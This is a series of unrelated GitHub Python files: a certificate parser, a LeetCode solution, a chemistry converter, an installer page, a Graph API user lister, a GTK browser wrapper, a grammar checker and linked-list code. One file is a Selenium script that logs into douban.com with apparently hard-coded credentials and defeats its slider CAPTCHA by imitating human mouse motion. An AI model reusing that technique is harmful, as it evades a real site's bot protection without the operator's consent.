# Parse and print the main certificate fields.
print("Emeteur: {}".format(certificat.issuer))
print("Sujet: {}".format(certificat.subject))
print("Algorithme de signature: {}".format(certificat.signature_hash_algorithm))
print("Clé publique: {}".format(certificat.public_key()))
print("Numéro de série: {}".format(certificat.serial_number))
print("Début de validité: {}".format(certificat.not_valid_before))
print("Fin de validité: {}".format(certificat.not_valid_after))
34884744439 | # -*- coding: utf-8 -*-
# @Time : 2021/9/12 11:03
# @Author : XDD
# @File : 可呼唤矩形的组数.py
from functools import reduce
class Solution:
    """LeetCode 2001: count pairs of interchangeable rectangles."""

    def interchangeableRectangles(self, rectangles) -> int:
        """Return the number of index pairs (i, j), i < j, whose rectangles
        share the same width/height ratio.

        Each ratio is stored as a gcd-reduced (width, height) tuple so equal
        ratios compare exactly; the original float division can misgroup
        ratios for large inputs.  A group of k equal ratios contributes
        k * (k - 1) // 2 pairs (C(k, 2)), computed with integer arithmetic
        instead of the original factorial-based reduce, so the result is an
        exact int.
        """
        from math import gcd
        counts = {}
        for width, height in rectangles:
            g = gcd(width, height)
            counts[(width // g, height // g)] = counts.get((width // g, height // g), 0) + 1
        # Sum C(k, 2) over every ratio group.
        return sum(k * (k - 1) // 2 for k in counts.values())
# Demo: ratios reduce to 1/7, 1/4, 1, 2/5, 1/4, 7/4 -> one interchangeable pair.
sol = Solution()
print(sol.interchangeableRectangles([[1,7],[2,8],[8,8],[2,5],[2,8],[7,4]]))
1168399995 | from molsysmt._private.digestion import digest
@digest(form='openmm.Modeller')
def to_openmm_System(item, atom_indices='all', structure_indices='all',
        forcefield=None, non_bonded_method='no_cutoff', non_bonded_cutoff='1.0 nm', constraints=None,
        rigid_water=True, remove_cm_motion=True, hydrogen_mass=None, switch_distance=None,
        flexible_constraints=False):
    """Convert an openmm.Modeller into an openmm.System.

    The Modeller is first reduced to an openmm.Topology (honoring
    atom_indices/structure_indices) and the topology is then parameterized
    with *forcefield* and the remaining non-bonded/constraint options.
    """
    from . import to_openmm_Topology
    from ..openmm_Topology import to_openmm_System as openmm_Topology_to_openmm_System

    tmp_item = to_openmm_Topology(item, atom_indices=atom_indices, structure_indices=structure_indices)
    # Bug fix: the original forwarded **kwargs here although this function
    # declares no **kwargs parameter, so every call raised NameError.
    tmp_item = openmm_Topology_to_openmm_System(tmp_item, forcefield=forcefield,
            non_bonded_method=non_bonded_method, non_bonded_cutoff=non_bonded_cutoff,
            constraints=constraints, rigid_water=rigid_water, remove_cm_motion=remove_cm_motion,
            hydrogen_mass=hydrogen_mass, switch_distance=switch_distance,
            flexible_constraints=flexible_constraints)

    return tmp_item
| uibcdf/MolSysMT | molsysmt/form/openmm_Modeller/to_openmm_System.py | to_openmm_System.py | py | 1,268 | python | en | code | 11 | github-code | 50 |
16477507408 | from gi.repository import Gtk
import gettext
import locale
import os
import logging
import sys
from gtkbasebox import GtkBaseBox
# Useful vars for gettext (translations)
APP_NAME = "thus"
LOCALE_DIR = "/usr/share/locale"
import misc.i18n as i18n
class Language(GtkBaseBox):
def __init__(self, params, prev_page="None", next_page="location"):
super().__init__(self, params, "language", prev_page, next_page)
# Set up list box
self.listbox = self.ui.get_object("listbox")
self.listbox.connect("row-selected", self.on_listbox_row_selected)
self.listbox.set_selection_mode(Gtk.SelectionMode.BROWSE)
data_dir = self.settings.get('data')
self.current_locale = locale.getdefaultlocale()[0]
self.language_list = os.path.join(data_dir, "locale", "languagelist.txt.gz")
self.set_languages_list()
image1 = self.ui.get_object("image1")
image1.set_from_file(os.path.join(data_dir, "images/languages.png"))
label = self.ui.get_object("welcome_label")
label.set_name("WelcomeMessage")
def on_listbox_row_selected(self, listbox, listbox_row):
""" Someone selected a different row of the listbox """
if listbox_row is not None:
for vbox in listbox_row:
for label in vbox.get_children():
current_language, sorted_choices, display_map = i18n.get_languages(self.language_list)
lang = label.get_text()
lang_code = display_map[lang][1]
self.set_language(lang_code)
def translate_ui(self):
""" Translates all ui elements """
txt = _("Welcome to Manjaro")
txt = "<span weight='bold' size='large'>{0}</span>".format(txt)
self.title.set_markup(txt)
txt_bold = _("Notice: The Thus Installer is beta software.")
# FIXME: Can't use an a html tag in the label. Causes an accessible GTK Assertion
txt = _("Thus is pre-release beta software that is under active development. \n" \
"It does not yet properly handle RAID, btrfs subvolumes, or other \n" \
"advanced setups. Please proceed with caution as data loss is possible! \n\n" \
"If you find any bugs, please report them at http://bugs.manjaro.org")
txt_markup = "<span weight='bold'>{0}</span>\n\n{1}".format(txt_bold, txt)
label = self.ui.get_object("welcome_label")
label.set_markup(txt_markup)
def langcode_to_lang(self, display_map):
# Special cases in which we need the complete current_locale string
if self.current_locale not in ('pt_BR', 'zh_CN', 'zh_TW'):
self.current_locale = self.current_locale.split("_")[0]
for lang, lang_code in display_map.items():
if lang_code[1] == self.current_locale:
return lang
def set_languages_list(self):
""" Load languages list """
try:
current_language, sorted_choices, display_map = i18n.get_languages(self.language_list)
except FileNotFoundError as file_error:
logging.error(file_error)
sys.exit(1)
current_language = self.langcode_to_lang(display_map)
for lang in sorted_choices:
box = Gtk.VBox()
label = Gtk.Label()
label.set_markup(lang)
box.add(label)
self.listbox.add(box)
if current_language == lang:
self.select_default_row(current_language)
def set_language(self, locale_code):
if locale_code is None:
locale_code, encoding = locale.getdefaultlocale()
try:
lang = gettext.translation(APP_NAME, LOCALE_DIR, [locale_code])
lang.install()
# Translate buttons
txt = _("Forward")
self.forward_button.set_label(txt)
txt = _("Close")
self.exit_button.set_label(txt)
txt = _("Back")
self.backwards_button.set_label(txt)
self.translate_ui()
except IOError:
logging.warning(_("Can't find translation file for the {0} language".format(locale_code)))
def select_default_row(self, language):
for listbox_row in self.listbox.get_children():
for vbox in listbox_row.get_children():
label = vbox.get_children()[0]
if language == label.get_text():
self.listbox.select_row(listbox_row)
return
def store_values(self):
lang = ""
listbox_row = self.listbox.get_selected_row()
if listbox_row is not None:
for vbox in listbox_row:
for label in vbox.get_children():
lang = label.get_text()
current_language, sorted_choices, display_map = i18n.get_languages(self.language_list)
if len(lang) > 0:
self.settings.set("language_name", display_map[lang][0])
self.settings.set("language_code", display_map[lang][1])
return True
def prepare(self, direction):
self.translate_ui()
# Enable forward button
self.forward_button.set_sensitive(True)
# Hide backwards button
self.backwards_button.hide()
self.show_all()
# When testing, no _() is available
try:
_("")
except NameError as err:
def _(message):
return message
if __name__ == '__main__':
from test_screen import _, run
run('Language')
| manjaro/thus | thus/language.py | language.py | py | 5,536 | python | en | code | 24 | github-code | 50 |
21355271077 | """
Author(s):
Miguel Alex Cantu
Date: 04/21/2020
Description:
This function will return a dictionary of all the users
in the tenant, indexed by userPrincipalName
"""
# Imports
from make_request import paginate
from test_cases import TestCases
# Variables
# This query fetches all of the users along with the attributes defined
# in the select filter ($select keeps the response payload small; Graph
# accepts the trailing comma in the select list).
GRAPH_USERS_URI = (
    "https://graph.microsoft.com/v1.0"
    "/users"
    "?$select="
    "accountEnabled,"
    "companyName,"
    "country,"
    "createdDateTime,"
    "displayName,"
    "id,"
    "jobTitle,"
    "mail,"
    "officeLocation,"
    "onPremisesExtensionAttributes,"
    "onPremisesSamAccountName,"
    "usageLocation,"
    "userPrincipalName,")
def list_all_users(config, app, parsed_args):
    """Fetch every user in the tenant and return them keyed by
    userPrincipalName.

    paginate() walks the Graph API pages and appends each record found
    under the 'value' key of every response into the accumulator list.
    """
    fetched = []
    paginate(GRAPH_USERS_URI,
             fetched,
             'value',
             config,
             app,
             parsed_args,
             test_data=TestCases().get_test_user_graph_data())
    # Re-key the flat list by UPN for O(1) lookups.
    return {entry["userPrincipalName"]: entry for entry in fetched}
| alextricity25/AzurePythonScripts | list_all_users.py | list_all_users.py | py | 1,224 | python | en | code | 1 | github-code | 50 |
23136949539 | """
使用selenium破解豆瓣滑块验证码
"""
from selenium import webdriver
# 导入鼠标事件类
from selenium.webdriver import ActionChains
import time
# Trajectory helper: simulate accelerate-then-brake slider motion.
def get_tracks(distance):
    """Build a human-like slider trajectory covering *distance* pixels.

    The motion accelerates uniformly (a = 2) for the first 4/5 of the
    distance and then brakes (a = -3), sampled in fixed 0.3 s steps using
    the constant-acceleration formulas v = v0 + a*t and s = v0*t + a*t^2/2.
    Returns the list of per-step displacements, rounded to whole pixels.
    """
    step = 0.3                        # sampling interval (seconds)
    speed = 0                         # current velocity
    travelled = 0                     # distance covered so far
    slowdown_at = distance * 4 / 5    # switch from accelerating to braking here
    moves = []
    while travelled < distance:
        accel = 2 if travelled < slowdown_at else -3
        # Displacement within this 0.3 s slice.
        shift = speed * step + 0.5 * accel * (step ** 2)
        travelled += shift
        moves.append(round(shift))
        # Velocity at the end of the slice becomes the next initial velocity.
        speed = speed + accel * step
    return moves
# 1. Open the browser and load douban.com.
driver = webdriver.Chrome()
driver.get(url='https://www.douban.com/')
# 2. The login form lives in an iframe child page; switch into it.
iframe_node = driver.find_element_by_xpath('//div[@class="login"]/iframe')
driver.switch_to.frame(iframe_node)
# 3. Click the password-login tab, fill in username and password, and press
#    the login button.
driver.find_element_by_xpath('/html/body/div[1]/div[1]/ul[1]/li[2]').click()
driver.find_element_by_xpath('//*[@id="username"]').send_keys('13916319522')
driver.find_element_by_xpath('//*[@id="password"]').send_keys('5201314')
driver.find_element_by_xpath('/html/body/div[1]/div[2]/div[1]/div[5]/a').click()
time.sleep(5)
# 4. The captcha is yet another iframe; switch into it as well.
driver.switch_to.frame('tcaptcha_iframe')
# 5. Press and hold the slider, then drag quickly most of the way (~172 px).
click_node = driver.find_element_by_xpath('//*[@id="tcaptcha_drag_button"]')
ActionChains(driver).click_and_hold(click_node).perform()
ActionChains(driver).move_to_element_with_offset(click_node, xoffset=172, yoffset=0).perform()
# 6. Cover the remaining distance (~25 px) with the human-like
#    accelerate/brake trajectory from get_tracks().
tracks = get_tracks(25)
for track in tracks:
    ActionChains(driver).move_by_offset(xoffset=track, yoffset=0).perform()
# Pause briefly before releasing the mouse so the drag looks natural.
time.sleep(1)
ActionChains(driver).release().perform()
| sjk052026/test2020 | spider/day26/doubanSpiderSelenlum.py | doubanSpiderSelenlum.py | py | 2,676 | python | zh | code | 0 | github-code | 50 |
15675857824 | #!/usr/bin/env python
import json
import logging
from gi.repository import WebKit
from gi.repository import GObject
class Browser(GObject.GObject):
"""Webkit browser wrapper to exchange messages with Gtk.
:param uri: URI to the HTML file to be displayed.
:type uri: str
"""
__gsignals__ = {
'message-received': (GObject.SIGNAL_RUN_FIRST, None, (object,))
}
def __init__(self, uri):
# Initialize to be able to emit signals
GObject.GObject.__init__(self)
self.widget = WebKit.WebView()
self.widget.open(uri)
self.widget.connect('title-changed', self.title_changed_cb)
@property
def size(self):
"""Return size of the browser widget.
:returns: Browser widget width and height
:rtype: tuple(int, int)
"""
rectangle = self.widget.get_allocation()
return (rectangle.width, rectangle.height)
def title_changed_cb(self, _widget, _frame, title):
"""Put window title in the message queue.
Window title changes are received as an event in the Gtk interface.
This is used as a hack to make it possible to send messages from webkit
to Gtk.
:param title: Window title
:type title: str
"""
logging.debug('title changed: %r', title)
message = json.loads(title)
self.emit('message-received', message)
def send(self, message):
"""Send message from Gtk to WebKit.
:param message: javascript code to execute in the browser widget
:type message: str
"""
logging.debug('(Gtk -> WebKit) %s', message)
self.widget.execute_script(message)
# Register the GObject subclass so the custom signal above can be emitted.
GObject.type_register(Browser)
| jcollado/pygtk-webui | browser.py | browser.py | py | 1,769 | python | en | code | 4 | github-code | 50 |
13039300169 | #Import tkinter for GUI libraries
import tkinter as Tkinter
from tkinter import *
import string
#Import tkMessageBox for information and help message box
import tkinter.messagebox as tkMessageBox
def helpMsg():
    """Show the 'About' information dialog for the grammar checker."""
    # Fixed the duplicated "is is" and casing typos in the user-visible text.
    tkMessageBox.showinfo("About this Software", "This software is intended to increase proper usage of English without error")
#Import nltk for language processing
from nltk import *
# Probe the NLTK tokenizer data: word_tokenize raises LookupError when the
# punkt models are not installed yet.
try:
    sentence = "example sentence"
    tokens = word_tokenize(sentence)
# If the data is absent, download the full "book" collection once.
except LookupError:
    print("Downloading requisite English language processing code...")
    download('book')
# Rebuild a sentence string from (word, part-of-speech) pairs.
def tagsToString(tags):
    """Join (word, POS) pairs back into a sentence string.

    Punctuation tokens (POS '.') and contractions (tokens starting with an
    apostrophe) attach directly to the preceding word; every other word is
    separated by a single space.  The result always carries exactly one
    leading space.
    """
    pieces = []
    for word, pos in tags:
        if pos == '.' or word[0] == "'":
            pieces.append(word)
        else:
            pieces.append(" " + word)
    return " " + "".join(pieces).strip()
# Rule 1: an adjective must precede, not follow, its noun.
def Error1(tags):
    """Swap any noun that directly precedes an adjective (in place).

    Returns True when at least one swap was performed, False otherwise
    (including for inputs shorter than two tokens).
    """
    if len(tags) < 2:
        return False
    noun_tags = ('NN', 'NNS', 'NNP', 'NNPS', 'PRP', 'RP', 'DT')
    swapped = False
    for idx in range(len(tags) - 1):
        if tags[idx][1] in noun_tags and tags[idx + 1][1] == 'JJ':
            tags[idx], tags[idx + 1] = tags[idx + 1], tags[idx]
            swapped = True
    return swapped
# Rule 2a: a gerund/present-tense verb needs a form of "to be" before it.
def Error2a(tags):
    """Insert the missing form of 'to be' before a gerund, in place.

    Scans for a present-tense verb whose preceding token is not a verb and,
    depending on the subject pronoun (I / he, she / they, we, you), inserts
    'am' / 'is' / 'are' for statements or before the verb for questions.
    The whitelists exclude stative verbs ('like', 'know', ...) that do not
    take the progressive.  Returns True when an insertion was made.

    Bug fix: removed the leftover "Hemant ..." debug print statements that
    flooded stdout on every call; the correction logic is unchanged.
    """
    error = False
    flag = 0
    if len(tags) < 2:
        return error
    nouns = ['NN','NNS','NNP','NNPS','PRP','RP']
    verbs = ['VB','VBD','VBG','VBN','VBP','VBZ','MD']
    capitals = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    tagsLength = len(tags) - 1
    for i in range(tagsLength):
        firstWord = tags[i][0]
        firstPOS = tags[i][1]
        secondWord = tags[i+1][0]
        secondPOS = tags[i+1][1]
        # Two consecutive finite verbs: drop the second one.
        if tags[i][1] in ['VBD','VBG','VBP','VBZ'] and tags[i+1][1] in ['VBD','VBG','VBP','VBZ']:
            tags.remove(tags[i+1])
            break
        # NOTE(review): `x not in capitals` is a substring test, so any
        # multi-character word passes; this re-capitalizes the noun and
        # forces its POS to 'NN'.  Behavior preserved from the original.
        if firstPOS in nouns and tags[i][0] not in capitals:
            newword = tags[i][0].capitalize()
            tags.remove(tags[i])
            tags.insert(i,(newword,'NN'))
            break
        if secondPOS in ['VBD','VBG','VBP','VBZ'] and firstPOS not in verbs:
            # Look ahead to see whether this clause is a statement ('.')
            # or a question ('?') before choosing where to insert.
            for j in range(i,len(tags)):
                if tags[j][0] == '.':
                    if firstWord in ['I']:
                        if tags[i+1][0] not in ['Am','am','like','liked','can','could','had','have','will','would','love','loved','see','saw','hate','hated','want','wanted','need','needed','own','owned','belong','hear','heard','smell','seem','seemed','know','knew','believe','believed','remember','remembered','doubt','doubted','dislike','disliked','understand','understood','suspect','suspected','loath','loathed','forget','forgot','prefer','preferred','feel']:
                            tags.insert(i+1,('am','VBP'))
                            flag = 1
                            error = True
                            break
                    elif firstWord in ['He','he','She','she']:
                        if tags[i+1][0] not in ['Is','is','like','liked','can','could','had','have','will','would','love','loved','see','saw','hate','hated','want','wanted','need','needed','own','owned','belong','hear','heard','smell','seem','seemed','know','knew','believe','believed','remember','remembered','doubt','doubted','dislike','disliked','understand','understood','suspect','suspected','loath','loathed','forget','forgot','prefer','preferred', 'feel']:
                            tags.insert(i+1,('is','VBP'))
                            flag = 1
                            error = True
                            break
                    elif firstWord in ['They','they','We','we','You','you']:
                        if tags[i+1][0] not in ['Are','are','like','liked','can','could','had','have','will','would','love','loved','see','saw','hate','hated','want','wanted','need','needed','own','owned','belong','hear','heard','smell','seem','seemed','know','knew','believe','believed','remember','remembered','doubt','doubted','dislike','disliked','understand','understood','suspect','suspected','loath','loathed','forget','forgot','prefer','preferred','start','started','feel']:
                            tags.insert(i+1,('are','VBP'))
                            flag = 1
                            error = True
                            break
                elif tags[j][0] == '?':
                    if firstWord in ['I']:
                        if tags[i+1][0] not in ['Am','am']:
                            tags.insert(i,('am','VBP'))
                            flag = 1
                            error = True
                            break
                    elif firstWord in ['He','he','She','she']:
                        if tags[i+1][0] not in ['Is','is']:
                            tags.insert(i,('is','VBP'))
                            flag = 1
                            error = True
                            break
                    elif firstWord in ['They','they','We','we','You','you']:
                        if tags[i+1][0] not in ['Are','are','Will','will']:
                            tags.insert(i,('are/will','VBP'))
                            flag = 1
                            error = True
                            break
        if flag == 1:
            break
    return error
# Rule 2b: "do/does" should not be combined with another modal verb.
def Error2b(tags):
    """Remove a redundant modal verb appearing with 'do'/'does' (in place).

    A modal ('MD') directly after, or one token after, a form of 'do' is
    blanked out and then stripped from the list.  Returns True when at
    least one modal was removed.
    """
    if len(tags) < 2:
        return False
    do_forms = ('do', 'Do', 'does', 'Does')
    placeholder = ('', '')
    found = False
    for idx in range(len(tags) - 2):
        word = tags[idx][0]
        if word in do_forms and tags[idx + 1][1] == 'MD':
            tags[idx + 1] = placeholder
            found = True
        elif word in do_forms and tags[idx + 2][1] == 'MD':
            tags[idx + 2] = placeholder
            found = True
    while placeholder in tags:
        tags.remove(placeholder)
    return found
# Rule 3a: repair punctuation (end marks, clause commas, possessives).
def Error3a(tags):
    """Fix punctuation in place and return True when anything changed.

    Passes, in order: append '?' to questions / '.' to statements that lack
    an end mark; split sentences before an unexpected mid-sentence capital;
    insert a comma before a coordinating conjunction joining two clauses
    that both contain a verb; drop a comma not followed by a conjunction;
    turn trailing-'s' words before a noun into possessives; and add the
    comma in a trailing ", please?".

    Bug fix: removed the leftover "Hemant 3a ..." debug prints; this also
    removes an unconditional print(tags[-3][0]) that raised IndexError for
    two-token inputs.  The correction logic itself is unchanged.
    """
    error = False
    if len(tags) < 2:
        return error
    capitals = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    question=["Who","What","Where","When","Why","How","who","what","where","when","why","how","Is","Are","is","are","Do","do","Should","May","Could","should","may","could","would","Would","Does","do"]
    # A question word at the start but no trailing '?' -- replace the last
    # token with a question mark (note: this drops the final word).
    if tags[0][0] in question and tags[len(tags)-1][0] != '?':
        i = len(tags) - 1
        tags.remove(tags[i])
        tags.append(('?','.'))
        error = True
    # No end mark at all: pick '?' or '.' based on the sentence opener.
    if tags[-1][1] != ('.'):
        for x in range(len(tags)-1,-1,-1):
            if tags[x][1] in ['.','?','!']:
                break
        if x != 0:
            x += 1
        if tags[x][0] in question:
            tags.append(('?','.'))
        else:
            tags.append(('.','.'))
        error = True
    # A capitalized word mid-sentence (not a proper noun or 'I') marks a new
    # sentence: insert the appropriate end mark before it.
    for i in range(len(tags)-1):
        currentWord = tags[i][0]
        currentPOS = tags[i][1]
        nextWord = tags[i+1][0]
        nextPOS = tags[i+1][1]
        if nextPOS != 'NNP' and nextWord != "I" and nextWord[0] in capitals and currentPOS != '.':
            for x in range(i,-1,-1):
                if tags[x][1] in ['.','?','!']:
                    break
            if x != 0:
                x += 1
            if tags[x][0] in question:
                tags.insert(i+1,('?','.'))
            else:
                tags.insert(i+1,('.','.'))
            error = True
    verbs = ['VB','VBD','VBG','VBN','VBP','VBZ','MD']
    fanboys = ['for','and','nor','but','or','yet','so','because','while','although','therefore','thus']
    addCommas = []
    left = False
    # NOTE(review): `right` starts True and is never reset, so the
    # right-hand clause check is effectively always satisfied after the
    # first conjunction.  Behavior preserved from the original.
    right = True
    for i in range(len(tags)-1):
        currentWord = tags[i][0]
        currentPOS = tags[i][1]
        if currentWord in fanboys:
            for j in range(i,len(tags)):
                if tags[j][1] in verbs:
                    right = True
                    break
                elif tags[j][1] == '.':
                    break
            for j in range(i,-1,-1):
                if tags[j][1] in verbs:
                    left = True
                    break
                elif tags[j][1] == '.':
                    break
            if left and right:
                error = True
                addCommas.append(i)
    for loc in addCommas:
        tags.insert(loc,(',','.'))
    # Remove (at most one) comma not followed by a conjunction.
    removeCommas = []
    for i in range(len(tags)-1):
        if tags[i][0] == ',' and tags[i+1][0] not in fanboys:
            removeCommas.append(i)
            error = True
    for loc in removeCommas:
        del tags[loc]
        # NOTE(review): resets the error flag -- preserved from the original.
        error = False
        break
    nouns = ['NN','NNS','NNP','NNPS','PRP','RP']
    for i in range(len(tags)-1):
        # word ending in s followed by a noun -> make it possessive (word's).
        if tags[i][0][-1] == 's' and tags[i][0][-2] != "'" and tags[i+1][1] in nouns:
            tags[i] = (tags[i][0][:-1]+"'"+tags[i][0][-1],tags[i][1])
            error = True
        # "... please?" needs a comma before 'please'.
        if tags[-2][0] == 'please' and tags[-1][0] == "?":
            tags.insert(-2,(',','.'))
            error = True
            break
    return error
# Rule 3b: capitalize sentence starts and the pronoun "i".
def Error3b(tags):
    """Capitalize the first word, the pronoun 'i', and any word following a
    sentence-ending mark (in place).  Returns True when anything changed."""
    if len(tags) < 2:
        return False
    uppercase = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    sentence_end = ".!?"
    changed = False
    for pos in range(len(tags) - 1):
        word = tags[pos][0]
        follower = tags[pos + 1][0]
        if (pos == 0 or word == 'i') and word[0] not in uppercase:
            tags[pos] = (word.capitalize(), tags[pos][1])
            changed = True
        elif word in sentence_end and follower[0] not in uppercase:
            tags[pos + 1] = (follower.capitalize(), tags[pos + 1][1])
            changed = True
    return changed
# Rule 3c: pick the right indefinite article for the following word.
def Error3c(tags):
    """Fix indefinite articles in place: 'a' before a vowel becomes 'an'
    and 'an' before a consonant becomes 'a' (case preserved).  Returns
    True when at least one article was changed."""
    if len(tags) < 2:
        return False
    to_an = {'a': 'an', 'A': 'An'}
    to_a = {'an': 'a', 'An': 'A'}
    vowels = 'aeiouAEIOU'
    fixed = False
    for idx in range(len(tags) - 1):
        article = tags[idx][0]
        nxt = tags[idx + 1][0]
        if article in to_an and nxt[0] in vowels:
            tags[idx] = (to_an[article], tags[idx][1])
            fixed = True
        elif article in to_a and nxt[0] not in vowels:
            tags[idx] = (to_a[article], tags[idx][1])
            fixed = True
    return fixed
# Rule 4: rewrite "X the Y" genitives as "the Y's X".
def Error4(tags):
    """Rewrite noun-'the'-noun sequences into possessive form, in place:
    e.g. "book the boy" -> "the boy's book".  Returns True when at least
    one rewrite happened.

    Bug fix: removed the leftover "4"/"4a"/"4b" debug prints that polluted
    stdout on every call; the rewrite logic is unchanged.
    """
    error = False
    if len(tags) < 3:
        return error
    nouns = ['NN','NNS','NNP','NNPS','PRP','RP']
    for i in range(len(tags)-2):
        firstWord = tags[i][0]
        firstPOS = tags[i][1]
        secondWord = tags[i+1][0]
        secondPOS = tags[i+1][1]
        thirdWord = tags[i+2][0]
        thirdPOS = tags[i+2][1]
        if secondWord == 'the' and firstPOS in nouns and thirdPOS in nouns:
            # Rotate to "the <owner>" then append "'s <owned>".
            tags[i] = (secondWord,secondPOS)
            tags[i+1] = (thirdWord,thirdPOS)
            tags[i+2] = (firstWord,firstPOS)
            tags.insert(i+2,("'s", 'POS'))
            error=True
    return error
#Master function which calls all of the error checks and which
#prints the evolving structure of the sentence for debugging
def checkErrors(text):
    """Tokenize *text*, run every correction pass in sequence, and return
    (fixedText, errors): the corrected sentence (with the leading space that
    tagsToString adds) and a newline-separated summary of the rules that
    fired.  Side effect: recolors the GUI label L6 (green when clean, red
    otherwise).  The print() calls trace each pass for debugging.
    """
    errors = ""
    print("Sentence:")
    print(text)
    tokens = word_tokenize(text)
    print("Tokens:")
    print(tokens)
    tags = pos_tag(tokens)
    print("Original:")
    print(tags)
    e3a = Error3a(tags)
    print("Punctuation correction:")
    print(tags)
    e3b = Error3b(tags)
    print("Capitalization correction:")
    print(tags)
    e1 = Error1(tags)
    print("Noun preceding adjective correction:")
    print(tags)
    e2a = Error2a(tags)
    print("Omission of verb 'to be' in gerund correction:")
    print(tags)
    e2b = Error2b(tags)
    print("Extraneous use of modal verb with 'do' correction:")
    print(tags)
    e3c = Error3c(tags)
    print("A/An correction:")
    print(tags)
    e4 = Error4(tags)
    print("Genitive construction correction:")
    print(tags)
    if e1:
        errors += "    Adjective cannot succeed noun.\n"
    if e2a:
        errors += "    Verb 'to be' is needed with a gerund.\n"
    if e2b:
        errors += "    A modal verb is not needed with 'do'.\n"
    if e3a:
        errors += "    Punctuation must be in its proper place. Place a comma to seperate clauses, full-stop at the end of the sentence, and question mark at the end of questions.\n"
    if e3b:
        errors += "    The beginning of sentences and proper nouns must be capitalized.\n"
    if e3c:
        errors += "    Improper use of articles, use 'An' before noun starting with vowels, 'A' otherwise.\n"
    if e4:
        errors += "    The genitive construction uses a possessive.\n"
    fixedText = tagsToString(tags)
    if errors == "":
        errors = "    It looks good as long as your sentence is in the present tense. Good job."
        L6.config(fg='green')
        top.update()
    else:
        L6.config(fg='red')
    return (fixedText,errors)
#Master function which analyses text
def analyze():
    """Read the sentence from the T1 text box, run checkErrors, post-process
    the casing, and push the suggestion and rule summary into the GUI labels.
    """
    text = T1.get("1.0",END)
    fixedText, errors = checkErrors(text)
    fixedText = fixedText.split()
    # Lower-case words that ended up capitalized mid-sentence, keeping "I",
    # acronym-like words (two leading capitals), and true sentence starts
    # (previous word ends with '.').
    for index in range(1, len(fixedText)):
        if fixedText[index] != 'I':
            if len(fixedText[index])>1 :
                if (fixedText[index][0] in string.ascii_uppercase and
                    fixedText[index][1] in string.ascii_uppercase) : continue
                else :
                    l = len(fixedText[index-1])
                    if fixedText[index-1][l-1] != '.' :
                        fixedText[index] = fixedText[index].lower()
            else :
                if fixedText[index][0] in string.ascii_uppercase :
                    l = len(fixedText[index-1])
                    if fixedText[index-1][l-1] != '.' :
                        fixedText[index] = fixedText[index].lower()
    fixedText = ' '.join(fixedText)
    # Ensure the very first character is upper-case.
    if fixedText[0] not in string.ascii_uppercase:
        if fixedText[0] in string.ascii_lowercase:
            tmp = fixedText[:1]
            tmp = tmp.upper()
            fixedText = tmp + fixedText[1:]
    L3v.set("\n   Suggestion:\n")
    L4v.set(fixedText)
    L5v.set("\n   Misused grammatical rules that may help you:\n")
    L6v.set(errors)
# Center a toplevel window on the screen.
def center(win):
    """Move *win* so that it sits centered on the screen."""
    win.update_idletasks()
    w = win.winfo_width()
    h = win.winfo_height()
    x_pos = (win.winfo_screenwidth() // 2) - (w // 2)
    y_pos = (win.winfo_screenheight() // 2) - (h // 2)
    win.geometry('{}x{}+{}+{}'.format(w, h, x_pos, y_pos))
#User interface code
top = Tk()
top.title("Learn English More Effectively by Avoiding Typical Mistakes")
top.geometry('800x800')
L1 = Label(top, text="\n Please type your sentence here:\n", font=("Helvetica", 14))
L1.pack(anchor=W)
T1 = tkinter.Text(top,height=4,width=60,font=("Helvetica", 14))
T1.pack()
L2 = Label(top, text="", font=("Helvetica", 14))
L2.pack()
B1 = Button(top, text=" Check ", command=analyze,font=("Helvetica", 14))
B1.pack()
L3v = StringVar()
L3 = Label(top, textvariable=L3v, font=("Helvetica", 14, "bold"))
L3.pack(anchor=W)
L4v = StringVar()
L4 = Label(top, textvariable=L4v, font=("Helvetica", 14), justify=LEFT, wraplength=800)
L4.pack(anchor=W)
L5v = StringVar()
L5 = Label(top, textvariable=L5v, font=("Helvetica", 14, "bold"))
L5.pack(anchor=W)
L6v = StringVar()
L6 = Label(top, textvariable=L6v, fg="red", font=("Helvetica", 12), justify=LEFT, wraplength=800)
L6.pack(anchor=W)
B2 = Tkinter.Button(top, text = "?", command = helpMsg)
B2.pack()
center(top)
top.mainloop()
| hmansoori002/GrammerUp | GrammerUp.py | GrammerUp.py | py | 17,985 | python | en | code | 0 | github-code | 50 |
7369861512 |
## iterative approach
class node:
    """A single cell of a singly linked list."""

    def __init__(self, data):
        self.data = data   # payload held by this node
        self.next = None   # successor; None marks the tail of the list
class Linkedlist:
    """Minimal singly linked list with head insertion and iterative reversal."""

    def __init__(self):
        self.head = None  # empty list

    def reverseiterative(self, head):
        """Reverse the chain starting at `head` and return the new head.

        Bug fix: the original began with
        `if head == None or head.next == None: return`, returning None for
        empty and single-node lists. The caller below does
        `llist.head = llist.reverseiterative(llist.head)`, so a one-element
        list was silently destroyed. The standard pointer-flip loop handles
        lengths 0 and 1 naturally (they are their own reversal).
        """
        prev = None
        current = head
        while current is not None:
            nxt = current.next    # remember the remainder of the chain
            current.next = prev   # flip this node's link
            prev = current
            current = nxt
        return prev               # new head (old tail); None for an empty list

    def push(self, new_data):
        """Insert a new node carrying `new_data` at the head of the list."""
        new_node = node(new_data)
        new_node.next = self.head
        self.head = new_node

    def printlist(self):
        """Print the list contents from head to tail on one line."""
        temp = self.head
        while(temp != None):
            print(temp.data,end=" ")
            temp = temp.next
# Demo driver: build 85 -> 15 -> 4 -> 20 via head insertion, print it,
# reverse in place, and print again.
llist = Linkedlist()
llist.push(20)
llist.push(4)
llist.push(15)
llist.push(85)
llist.printlist()
print("")
# reverseiterative returns the new head; reassign so the list stays valid
llist.head = llist.reverseiterative(llist.head)
llist.printlist()
######################################
| sanket1105/DSA-with-Python | DSA/LinkedLists/ReverseLinkedList.py | ReverseLinkedList.py | py | 1,160 | python | en | code | 16 | github-code | 50 |
21167839945 | from matplotlib import pyplot as plt
plt.figure(figsize=(5, 2.5))  # canvas for the live trajectory scatter plot
# Simulation state shared (as globals) by the two integrators below.
distance = 0  # current height, integrated from velocity each unit timestep
velocity = 50  # current vertical velocity (initial launch speed)
a = -9.8  # constant acceleration, presumably gravity in m/s^2 -- units not stated
def integrate_dist ():
    """Euler-integrate height from the global velocity, plotting each step,
    until the projectile would fall below zero; then print the max height.

    NOTE(review): each loop step calls integrate_velocity(), which in turn
    calls integrate_dist() again -- mutual recursion that restarts this
    whole loop per timestep. It terminates only via the break condition in
    the nested calls; confirm this recursion is intentional rather than a
    leftover (the loop already applies the velocity update).
